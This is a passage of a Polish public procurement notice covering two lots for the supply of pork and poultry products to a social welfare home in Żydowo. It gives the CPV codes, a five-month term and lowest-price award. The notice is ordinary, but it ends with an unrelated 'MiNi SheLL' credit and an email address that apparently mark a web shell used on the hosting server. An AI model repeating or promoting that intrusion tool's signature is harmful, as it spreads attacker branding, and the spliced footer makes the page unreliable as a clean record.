<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część Nr 1 -Sukcesywna dostawa   mięsa  wieprzowego, produktów mięsnych i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywna dostawa  produktów  zwierzęcych, mięsa i produktów mięsnych  na potrzeby Domu Pomocy Społecznej w Żydowie .
Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe zestawienie  ilościowe
przedmiotu zamówienia  Cześć Nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sukcesywna dostawa   mięsa drobiowego produktów mięsnych i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywna dostawa  produktów  zwierzęcych, mięsa i produktów mięsnych  na potrzeby Domu Pomocy Społecznej w Żydowie .
Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe zestawienie  ilościowe przedmiotu zamówienia  Cześć Nr 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com